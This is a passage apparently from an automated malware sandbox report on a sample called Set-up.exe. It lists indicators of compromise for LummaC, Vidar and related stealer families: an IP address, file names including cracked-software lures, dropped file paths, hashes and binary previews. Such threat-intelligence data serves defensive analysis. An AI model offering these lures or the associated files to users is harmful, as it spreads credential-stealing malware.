                • 172.67.158.190
                00000.ps1Get hashmaliciousLummaCBrowse
                • 172.67.158.190
                123.ps1Get hashmaliciousLummaCBrowse
                • 172.67.158.190
                Setup.exeGet hashmaliciousLummaCBrowse
                • 172.67.158.190
                vce exam simulator 2.2.1 crackk.exeGet hashmaliciousLummaCBrowse
                • 172.67.158.190
                iUKUR1nUyD.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                • 172.67.158.190
                j6ks0Fxu6t.exeGet hashmaliciousLummaCBrowse
                • 172.67.158.190
                wIgjKoo9iI.exeGet hashmaliciousLummaCBrowse
                • 172.67.158.190
                Canvas of Kings_N6xC-S2.exeGet hashmaliciousUnknownBrowse
                • 172.67.158.190

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Local\Temp\8429\Functions.comPodcastsTries.exeGet hashmaliciousVidarBrowse
                  vce exam simulator 2.2.1 crackk.exeGet hashmaliciousLummaCBrowse
                    LVDdWBGnVE.exeGet hashmaliciousLummaC StealerBrowse
                      eMBO6wS1b5.exeGet hashmaliciousLummaC StealerBrowse
                        Setup.exeGet hashmaliciousLummaC StealerBrowse
                          AxoPac.exeGet hashmaliciousLummaCBrowse
                            Setup.exeGet hashmaliciousLummaCBrowse
                              Setup.exeGet hashmaliciousLummaCBrowse
                                fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                  ChoForgot.exeGet hashmaliciousVidarBrowse

                                    Created / dropped Files

                                    C:\Users\user\AppData\Local\Temp\8429\Functions.com

                                    Download File
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:modified
                                    Size (bytes):947288
                                    Entropy (8bit):6.630612696399572
                                    Encrypted:false
                                    SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                    MD5:62D09F076E6E0240548C2F837536A46A
                                    SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                    SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                    SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                    • Filename: PodcastsTries.exe, Detection: malicious, Browse
                                    • Filename: vce exam simulator 2.2.1 crackk.exe, Detection: malicious, Browse
                                    • Filename: LVDdWBGnVE.exe, Detection: malicious, Browse
                                    • Filename: eMBO6wS1b5.exe, Detection: malicious, Browse
                                    • Filename: Setup.exe, Detection: malicious, Browse
                                    • Filename: AxoPac.exe, Detection: malicious, Browse
                                    • Filename: Setup.exe, Detection: malicious, Browse
                                    • Filename: Setup.exe, Detection: malicious, Browse
                                    • Filename: fkawMJ7FH8.exe, Detection: malicious, Browse
                                    • Filename: ChoForgot.exe, Detection: malicious, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\8429\k

                                    Download File
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):477405
                                    Entropy (8bit):7.9996261675374845
                                    Encrypted:true
                                    SSDEEP:6144:0SvcRrMxl2Bnsnz4TcItTD+17JHSGg0rb6Pki2Pj3qIo/2gGyCJt6+FUAD3Y5N:hElszNoGQ822/kw6+mq3O
                                    MD5:78C8E2EC23BA94D7B2A1D79620E97AF7
                                    SHA1:313AD066888A700427D2E45871E039850DA14131
                                    SHA-256:81CB5681BC834B296F5C14A9C3D15B1EAFBA1122051372CE8A6BB12C68C886BA
                                    SHA-512:FAD8423F2D2446C16525B67148637C058A1C99EB08D4419FEE24A48A3A68ADD41A82A81E69FCC593C9D45B90B3F9E86CBE3FEAFE5E47A74ED72C0CE03BF30BD9
                                    Malicious:false
                                    Preview:..n@...@...<]@..m..}\...X\.....).....-B..j..z..<...?[]e\...!*......S.9........@.....6..92. .._8.fR^+.[O....z.M4QM4I.E...t..B.R..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rz...E.M.'.F...h..............W..I9L..W..I9L.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..p.&..,P..Myn.2..t.W........:....Sp..W....E..W..I9L.m......?.q8.5...x..2).U.j....R>.ri.~.<.j..(..|.......H1wX...z..6c...G.I....e...t...*CpO..@W..B....gH&..2g...gP.w._........C..+.Q..'v......B%^9..io.. JI..q_v.Y.;\....$....s3.......m.A;...T+.W..D~...W.:5.....N'.8...}.5+...-..VdH....h..[..z."...B.....g...~.z.n........`#.....BT..^.u-]8;;C7..8....(a.eA.c!...:.[..I..]pU...Z.J..!.V.=i[a=..o....BAq;(de...3U.....d.....d

                                    C:\Users\user\AppData\Local\Temp\Became

                                    Download File
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):42330
                                    Entropy (8bit):7.118745431703906
                                    Encrypted:false
                                    SSDEEP:768:MGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:MGmdATGODv7xvTphAiPChgZ2kOE6
                                    MD5:285F6DD5DC5B4C46336504FBA3601E53
                                    SHA1:AF019212787F6509124DDA21AD7CC36B8C9303A4
                                    SHA-256:93E9D8C181A051BAD1010C93AA6F3992A26882ED84ABFF6A5C89F703D8ABBDEF
                                    SHA-512:4F4781EAF75D03B09A5A76CFBCB66E2EFCA7CDCB9FB90E4EA76A74A03F0A511BEBECB51FDC7CF7E0C8AE2C7CE1749AC4841B8A3646B088497F60B04A45D6F90D
                                    Malicious:false
                                    Preview:....,.........P.r.o.m.p.t................P..8............................P..I.2...........O.K................PW.I.2...........C.a.n.c.e.l...............C.o.n.t.e.x.t.1.......S.c.r.i.p.t. .&.P.a.u.s.e.d.............E.&.x.i.t.....................U.n.a.b.l.e. .t.o. .p.a.r.s.e. .l.i.n.e.....U.n.a.b.l.e. .t.o. .o.p.e.n. .t.h.e. .s.c.r.i.p.t. .f.i.l.e.....S.t.r.i.n.g. .m.i.s.s.i.n.g. .c.l.o.s.i.n.g. .q.u.o.t.e...!.B.a.d.l.y. .f.o.r.m.a.t.e.d. .v.a.r.i.a.b.l.e. .o.r. .m.a.c.r.o...*.M.i.s.s.i.n.g. .s.e.p.a.r.a.t.o.r. .c.h.a.r.a.c.t.e.r. .a.f.t.e.r. .k.e.y.w.o.r.d..........<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"

                                    C:\Users\user\AppData\Local\Temp\Bicycle

                                    Download File
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):94208
                                    Entropy (8bit):6.57087105915997
                                    Encrypted:false
                                    SSDEEP:1536:0aynB6GMKY99z+ajU1Rjv18fRQLTh/5fhjLueoMmOrrHL/uDoiouK+r5bLmbZzWr:0VnBypIbv18mLthfhnueoMmOqDoioO57
                                    MD5:B9A650557B6D5C0EE74415C3871D3333
                                    SHA1:7087863259B57BBF0F4B3DCDE36E2C5286099006
                                    SHA-256:28BA04A3C0AD62F5AEDE0E77B9ECBCDF0FA085D1C484A1714493D5B84A89ED3D
                                    SHA-512:6B6E9A753C352B5DE7C9E08CAD73D8C99436F13B6E06E8554355335F8F60FB0A8C41E6283D25858E180D30B60856743D056612168CCB666F006B7E549E10FC16
                                    Malicious:false
                                    Preview:>."..Y_^3.[]...U..E.VW.@..0......F..u......8.l....>3._.F.....^]...U..E..M..@..0.p....M...9..3.]...U..S.].VW.C..E..C........3...F9u.v..K.........#.F;u.r.u.........>3._.F.....^[]...U..E.VW.@.........u.............>3._.F.....^]...U..S.].VW.C..E..C.......3...F9u.v..K.....v.....F;u.r.u....w....>3._.F.....^[]...U..QQS.].VW3..M.F.{..j._.u........C..H..M..y..u....8).......E....M..A..8........C..p....)....F........BteH...t[...t]...tUH...tK...tM.u.........U.3.&.C.^....H..|....D..t..@8.X..|....D..t..@8.@..........j ..j._.u..{..r..C..H..m......K....a............ .]...#.#.E...y...x...+.;.}...u..u....>......c3..+.C..E...3.K...@#U........ s..H.#......M... s.+.X.....u.........U......#]..J.......#..E...3..F....._^[....U..SV.u.W.N..I......N..]..9.q...x.......................t..........i...........o....C.....3..;_^[]...U..S.].VW.C..E..C....1...3...F9u.v..K.........3.F;u.r.u.........>3._.F.....^[]...U.....E.V.@.......QQ..$......u.......].......E...j....F......g...RP.E.P.q...P..

                                    C:\Users\user\AppData\Local\Temp\Channel

                                    Download File
                                    Process:C:\Users\user\Desktop\Set-up.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):67584
                                    Entropy (8bit):7.997158353708972
                                    Encrypted:true
                                    SSDEEP:1536:Nmm6JM0zmZw6hX6hZYeLeFqskA/dPRpvZIWDhWpJxj0Qt44CZp:Nmm6+ymZRUhiDFt/dPRlaxjbt44I
                                    MD5:969EC8528212429FEFE3A915F2A551E8
                                    SHA1:3D6AAA9FB368AD5672AF58FFEF56A020904F0A44
                                    SHA-256:F1766AA088E7B422B5F207C2FE32A5434CA280EA43A41DE773B64423FDDE0605
                                    SHA-512:5D096527501C0E8956D8646C46AED3ACA3170A75AF27917F3B5B6FAA3C071C09584C1F961BA54E39F073305A06B67B987A7E053D1F810A96665AD4E74B729E14
                                    Malicious:false
                                    Preview:.....a9...\..v......k.J..(......g.:..x.-..^.......s...Gg.....d.["baK;.....r..^......?....<L;MTJ;0....x).j]K......ld.?.:).f.......88.....QD._.Jf.C.1l.^.*.......n.#.Z.m.......'..-...j.r|.@|e_.r.Q(..]....Z...<...=..F.z..g./6...J+_...#...6X=..:..$#J.h........+..5yr~9..X../.....@....9Y....tw...q.K..g....f..;......6....%.p..$6.b.FVz...f.K..6..g%).K...9p*....r..J._.(U,..M.}......G...'...`B.......`[..t<Ey.yi..v..k.Y..S..S.....r..i.T...9.i0....#.q..D...@...y..X1[....."g.........@......j...Ww@.jv...#..5..*..M.]N16.R...u`..9... .7.U..`...&.Yy.>...!.9..7%..-.m..R...yC...s+.Ov.XD.$.@U*u.3.M4.W.y.Y..<..{+.... |2.Xc7......qsAC.U....}....'.K4...w...n..G..4..J..4.@.j.|.@...~`....I...I..x.V+.0...C.b..}PS...qF.I..G.....)......xd..>.{...h=<..V.5.o.R......{.!=.d!I&..u..E.....v..8O..I.>......z.).e........W.%....#...<....m-...E...m..#./....E>".}.."..w.N..+nc.".......|...^.>.u/o..].._%.Fj..N.Y>*g...... ..p.(.3.d....0...H.....H..m.v+......f...#.1.5

                                    C:\Users\user\AppData\Local\Temp\Class

                                    Download File
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):128000
                                    Entropy (8bit):6.343581574055236
                                    Encrypted:false
                                    SSDEEP:3072:WZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWfH:WK5vPeDkjGgQaE/loUDtfH
                                    MD5:3C3F22E7E277C8D2C205CFEDFF41B8FE
                                    SHA1:A3E9C071EF2331EFB0E577052837DD20CEF89CBF
                                    SHA-256:8B5FDA7049360FCC5919D575781069ABDE1240F5B6CFF58545C9A63A01F73E0D
                                    SHA-512:1616967E38BBB75765BA3B5492CD9C09ADBC1F72A711EBBC78A7A3B281152EE1AE2F49F9EFCD063A73F12007D92421E18730F264107FA5ADD8F74475F26E64BE
                                    Malicious:false
                                    Preview:...................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...........

                                    C:\Users\user\AppData\Local\Temp\Contributor

                                    Download File
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):150528
                                    Entropy (8bit):5.29047018259943
                                    Encrypted:false
                                    SSDEEP:1536:0Kaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo2+9G:y6whxjgarB/5elDWy4ZND
                                    MD5:05559D6B1F499D4111B14432422CC29D
                                    SHA1:1AD84B14AFFC2837C7D433AE51FD20203609132A
                                    SHA-256:E563AF98650D995DF04B32F65099BFB08556565D63035C377ABC87DD22931FF7
                                    SHA-512:4B0C5F08FD835500C31F480CE71BF4DA6553167A307B95BDE25A12AE53F2DAFC26CEA69D947ED18365E02F2C115C61EC970B88A41805CE4E53CACAB3A96A54DB
                                    Malicious:false
                                    Preview::.:.:.:.:.:.r.r.r.............................................................................................................................................................r.k.....................r.r.r.r.....0.0.0.0.0.2...0.0.0.0.0.0.0.0.0.4.4.4.4.4.4.4.4.4.4.0.0.0.0.0.r...............................................................................................................r.r.r.r.r.r.r.r.r.............................r.r.....................r.r.........0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0...0.0.0.0.0.0.6.6.6.0.1.2.1.0.0.......................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r................................. .!.!. . ."."...#.#. .!.r.r.r.r.r.r.r.r.r.r.=.=.=.=.=.=.r.r.=.=.=.=.=.=.r.r.=.=.=.=.=.=.r.r.r.r.r.r.r.r.r.=.=.=.=.=.=.=.r.=.=.=.=.=.=.=.r.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!...j.j.j.j.r.r.r.r.!.z.r.r.r.r.r.

                                    C:\Users\user\AppData\Local\Temp\Facilitate

                                    Download File
                                    Process:C:\Users\user\Desktop\Set-up.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):7.997725415449113
                                    Encrypted:true
                                    SSDEEP:1536:txcJvPCI6nkRjfQbiQNYBbYyeVGVeDA5e5yi:tCZazubQbizRjqU50
                                    MD5:0CD07A755F492D21E6DD92FDE68B90E3
                                    SHA1:C32B0401B53FA1C073BBB35011BBE88E50A76DED
                                    SHA-256:619B347C4DFB59D260BE87FF2C85F893E91BE2CD8873A8D9A9FA039AFFA824DD
                                    SHA-512:BAB86484CBB16BE0C0DDC09BBDFDC335285B5EA22EBFCC2CE5AF6D6BE52844B78E0B4689ADE6E7C9A5FEEADC687A970A3D41E72418EF9D51BEE01B243DF4D584
                                    Malicious:false
                                    Preview:..n@...@...<]@..m..}\...X\.....).....-B..j..z..<...?[]e\...!*......S.9........@.....6..92. .._8.fR^+.[O....z.M4QM4I.E...t..B.R..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rz...E.M.'.F...h..............W..I9L..W..I9L.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..p.&..,P..Myn.2..t.W........:....Sp..W....E..W..I9L.m......?.q8.5...x..2).U.j....R>.ri.~.<.j..(..|.......H1wX...z..6c...G.I....e...t...*CpO..@W..B....gH&..2g...gP.w._........C..+.Q..'v......B%^9..io.. JI..q_v.Y.;\....$....s3.......m.A;...T+.W..D~...W.:5.....N'.8...}.5+...-..VdH....h..[..z."...B.....g...~.z.n........`#.....BT..^.u-]8;;C7..8....(a.eA.c!...:.[..I..]pU...Z.J..!.V.=i[a=..o....BAq;(de...3U.....d.....d

                                    C:\Users\user\AppData\Local\Temp\Girlfriend

                                    Download File
                                    Process:C:\Users\user\Desktop\Set-up.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):89088
                                    Entropy (8bit):7.998133460207129
                                    Encrypted:true
                                    SSDEEP:1536:55OPgHz6SzABVU+tSLSnGX1X3R8YR1cJIIsvzkbaOvcW40Gpri2Xj:5w0lABfSGnsRMZSzkb1vcW47/z
                                    MD5:8D26AFE63076864BC647EDCBFC678B5D
                                    SHA1:0C5CFE5FE28D6964861A5A2BB562649BCF80309D
                                    SHA-256:E59A7D9C29D65624375BC826D86978292A11D91220E293AFEAD6C8BF9A2F2DFA
                                    SHA-512:30DC632EB4C3A880529FB7BB8047DC8ED74E4F7EF70E0D20C8DA061F677EA71C49A8F0430006F0BA6F0D12BD43E196994D57397BF29A6D1CDF431C83B909F01F
                                    Malicious:false
                                    Preview:.-lh.\.].../..D...Q.S.s......Nc....%..r|.#y4..)I.7w..3......>...k....^.......3t...r...Y_..i...f.8.w`.Y..V._.....sd.dp...\...........!B..c.M.X.$..f..+.u.3..'W....2uB.d.Z...nVc.5x....B.P8..z.......f....=]....I.g..4O.^..NAiZ.g../....ZV..4.*.{. Z...........uYP<..h.n...O....-.......C$...7.......S..b.7^s.<.['0.4..#E9.l6..x0.....G..`...#{..."E..~.[.....q..v.cdn8f..r./..W:.`.6}z.FZ.."W|.U..b.x6VtoJ.UP....8..3..p...9/=.,..^8....z;..".....N,.D.Q]...#.]..!..'.H...O....9.U...p........y..9....F."y(".nw+F..D.....+........<....>...|x.%.7j]5......<..?.k..i%F]Z..4..V.Z%...@...#.....x'..u...0.....h0=.=|.?.K.ja@....uU..uh.n.X..Y.\39....b.3..,...Q/sj....f.T.82...q..h..D..Z.........%n....W.....b~..V#...s.}m.....(.$..?.....^.......<....,a..e.....o..D.7.\\2...l..g.........|&N..zu}..4.cp;...I...$...E.H~W...5(t9xP4..B-.....x8K./...N.......tw.D..[(.G?..=.n....x....Z ....u....<..9.37.p.7]..5....]d..U.B.zY..}...|n..J.0..(..t...9....1..^....Q.dL.>:....=5.

                                    C:\Users\user\AppData\Local\Temp\Id

                                    Download File
                                    Process:C:\Users\user\Desktop\Set-up.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):95232
                                    Entropy (8bit):7.998229039747749
                                    Encrypted:true
                                    SSDEEP:1536:QzipslTjVruE+XN1ryo8RWmro17HpFJY5zGW8HdfKjuvyaYJAi:UiqlTRKE+d1rJ8IF7HpHSzydKuvylqi
                                    MD5:41B538DD3C288C3DB544A32264360D47
                                    SHA1:578D01376BCCA0E70086688FC8A983A0555F0EFC
                                    SHA-256:F1E8E4DB7CB3823F7D1FFE6B2A213549F9213F5206C20FFE64CAA52878CEAB04
                                    SHA-512:6511E1E2735B41D9D246D64EA61B6092D4AC7C69A1D7F379CCE3CE7FAC5BCB77D0CCECA5DF593BB28830D2169C2B6A95CF22E0F539CD345BD048FC24F99046B7
                                    Malicious:false
                                    Preview:..y.[@'>.....?.....[..qx...}..2x..w...mr..w...r Q......5...."...Gi...[.,..e..00...s.$u...b?3..JU.J.&...n\k..F.J....O.D.....J<....a..7>c..y...#Vpt..EPkv.dpp.]x......(x. ..<....^........k.4c.3..w.......r.c.....?./.u7c....9..#x"w|..@..mB%.;k..AzO...\E.H>.........5......X\g.t-H3.^z..UUlI....2.....O....<.g.(*j..Q...(-...f(..+.b..,...{L~.)\.........]./(.5".SS.o.......!..1..es.}.g)u.\..y.D5.......r/o.rMaW.!.M."...K..9r......S..;.........?..+.J-.4V.....f.K.9}N]e...'........C....GG..>B.lc..U..N..9G...............f.........ak.0..a.....3.^...G...d\...q8.p.Do....ULw../..7..V.}....+/....a.~;wn...2.jqb......E]li......3........d.L.;....v.y.}.:.-...*CV..^..(nV.S.3.[.....:.wW.l...g....l8..-...V%..h.[..2.n.....H.....2.zB...#6.....ke->....:.4..........&L........7...N{N........+....z.{5.....oO{..8...4(>h..w....?}.g*.....|..S.......ZS..}'fpoQi.....#{>.H.....if...B..o...).h(rI.L......N.a.~...u..*.S...w....}.....@...7.Q...9WY...Q.4.w ...c...OMu.V.B.......C.4.....JG

                                    C:\Users\user\AppData\Local\Temp\Magnificent

                                    Download File
                                    Process:C:\Users\user\Desktop\Set-up.exe
                                    File Type:Microsoft Cabinet archive data, 486782 bytes, 9 files, at 0x2c +A "Became" +A "Bicycle", ID 5836, number 1, 29 datablocks, 0x1 compression
                                    Category:dropped
                                    Size (bytes):486782
                                    Entropy (8bit):7.998523412958793
                                    Encrypted:true
                                    SSDEEP:12288:IjCVqvNUzsRl8jZjrYrwJpvN4sdTMWDqC62bnkhSh:I1pRGjxYUTFNTPDrjb/
                                    MD5:945E73107FCC23F03FD38A4877DD7ECE
                                    SHA1:BE7D5D744D267C58E1A65C6365CCA3396AD842EA
                                    SHA-256:B16A88223BD4281D60BA9B6BA8B489826285F856B5355FE73E10A609E2A23BA4
                                    SHA-512:CD65278F237B4FF210069FC20D8F6CE908869A26F7E0261EE0D43BADB2EF7FC662EC19F70C6375A960C2116AC7698439054D278BA20489F2B193B3EAD5F4A33A
                                    Malicious:false
                                    Preview:MSCF....~m......,...........................Z..........Y. .Became..p..Z......Y. .Bicycle..0..Z......Y. .Opinions.....ZE.....Y. .Sharing.....bH.....Y. .Class..@..b<.....Y. .Phones..L..b|.....Y. .Contributor.....b......Y. .Strap.....b......Y. .Pa. 6.2._..CK...........n.;TwUuuW.............=...@p'H. .-H....]$.d....w.o.>.Z{.0....<..W...M...=...}.2$T-.5.9.1.........j.C&~6q.......B..%.....{..BUC.C..'V....L.?..d(2.).".....?9............w..j.g........F.....Z..ZW.J..z..bB..O.Pm.rd.9.3....w..+F...t.ov............n..........A.~.\q...N......[7...n.........H({...%~..z..x...N...P.u.m.vu.OD..i..c.P.P..z.....k.....*........E....{{|...~.%^...w.^.;D...m.Nn.......E.m;.vs.U...#.[Ld....:w.rs.....$t".u...C...@.nn..];.n-.Du..V.c..];w..*.p...ed..Ezh9":Fvj.*.[L..........o..?..S..W...}...n..;".w4..g.NT...).#..._.W.n.N-;..V.d..;w*\.s....;t..h.!..rDt...{dk.z....];....s..][.i...".{.?..{..m[T..].s.......Lc.E.VZ.V....|................~...-.E....Fu..

                                    C:\Users\user\AppData\Local\Temp\Opinions

                                    Download File
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):143360
                                    Entropy (8bit):6.666702742683981
                                    Encrypted:false
                                    SSDEEP:3072:UBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+Ap:ONPj0nEo3tb2j6AUkB0CThp6vl
                                    MD5:E94B7187CE6D03A3AB982B24B0F98208
                                    SHA1:19A97463FEC214AFEA0C2356D3E9A645FB25B6BA
                                    SHA-256:C4BE3E811093244FA248C37CD7FE7907CEB95AE88487A9E76B87A2C3D94EB2B7
                                    SHA-512:D2EFCB7BE10AE46BCB717074D65B9DAF67A7C0C6FB793C6BD70BACC27E0457DE38987AADD4CAD5143FE57A862913DD96C4A7879B1CF5837E6291FEF1706235AE
                                    Malicious:false
                                    Preview:.............B..E.........U(.u......u.J .z....+.}.j.....f.7^...}...t&.M....f......u.3.....+....}.f.....}.R.u.W..b...u.........x....M............U(..+....B<.z..J ..G;.w.4w.._;.s=3.9E......E.......}(f..f..f.M.G j.f...O ....O ...X...._;.r.E.u.].....E..U.....E........u..]..tC.u.j._...+...A...+...B...u........CjxXf.......f....f.B...u.u..u..U...&...U.......Z...C.....+....f;.t...f;.....u..}....t......f..f;...;........f;...-....},.u3..3...P.u(...u..m*.......u...F.jw.4FXf9.t...f....U...........f;.u...G...jw[f9.G.Z..F.t.f............}........f;.t.f;.t..A.j{f..Xj.f..[.o.u...3..u(f..+..u.....j.[............6P.G.WP..y...U....3.j.X.....f;.....j{...I.........f..Xf....F.f....U.f.G..E..t......f..9]...\%..3..E..R%...E..yf...0....E..yf...6%.......f;...5%...E............E...u..U...%...M...u....u..Cb...Cd.U.j.Y.D;E.u..Cf..;M.u....t.U..Chj.Yf....f.E.f....E.@....#E..E....E.f.2...f....U..$..j...[+.t....t....t.3...j'..j.[..j.X..}..tM.W.f..f#.....f;.....u4j.X+.+.....?PR......P.^...

                                    C:\Users\user\AppData\Local\Temp\Pa

                                    Download File
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):111616
                                    Entropy (8bit):6.6495311588075
                                    Encrypted:false
                                    SSDEEP:3072:t0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHZ:UbfSCOMVIPPL/sZ7HS3zl
                                    MD5:949D091F3D88FF361359C55D705C3F33
                                    SHA1:AC6B5C3D04484446E0047A94936557112623F17C
                                    SHA-256:E0E53D4A23D3AAE49C70CA10B59859E3896262F3B7ACEEB187CBBA4A3D18C0B7
                                    SHA-512:346A830C7A59C249D3AB96D1645E6631B09FEEA6A4F32DD119244A934D3011C73EEADDB1EA10F9E28684C1F1BEA5957A38F819A7AB702492F445108B925B16A4
                                    Malicious:false
                                    Preview:.....;......0......A..;.u........t@..,.....ss....0.....,....&3.P........,.........P..0...SP.........\...P..,...P....YY......j._+.3.........0;.r...7O...u...v.j.Y......;.......-.......*h.gJ...h.gJ...h.gJ...h.gJ..u.S.z0.......u'..t...._^[t...l...P....Y.M.3........].3.PPPPP.R/....U..M....u.............8..x$;..!M.s.....?...k.0.....M...D.(..@].................3.]..U..U.3...~..tg..y.j.YW.......t..........t..........t..........t....V..`....#.;.^u............@..t............ ..t..._..]..U..U.3...=...t]...t.j.Y...t.......t.......t...... t....V.......#.;.^u...............t...............t.........]..U..U.3.......t[...t.A...t.......t.......t.......t... V.......#.;.^u...............t...............t.........]..U..U.3.......tj...t......W........t......t..........t..........t.......V.......#.;.^u....`......t.... ..........t....@.._..]..U..U.3....tNV.......#.;.u.A.......#.;.u...........#.;.u...........#.;.^u.........#.;.u... ..]..U..U.3....tNV.......#.;.u.A.......#.;.u.........

                                    C:\Users\user\AppData\Local\Temp\Paid

                                    Download File
                                    Process:C:\Users\user\Desktop\Set-up.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):86016
                                    Entropy (8bit):7.997864687063212
                                    Encrypted:true
                                    SSDEEP:1536:S5EdcVrNFyjfgQcGsEecHVqSwjXq12Wzmag7p9C0qXrWi0rupTFrtUV80Casf3m:fcVrNFyTrcGsEeOVqSki2ENg7pjBiIqw
                                    MD5:1FC002A5AB4E21B3141AE28501FF4BB0
                                    SHA1:BB4AEFAB4E32F136F16794C792BDA77138182EFC
                                    SHA-256:75D98D578A104A0750AE46F6122CCAF2A7F936B8212DBE775C5A1C71E9938307
                                    SHA-512:1113D32E7BBB33A899666C8604E4064B13573D1DCB4FEFFF5B7768BBB0899D85EB7EE8EA384E2E6A5608002126EF68AF05A71626B8F9CCED8EFADE4E71521129
                                    Malicious:false
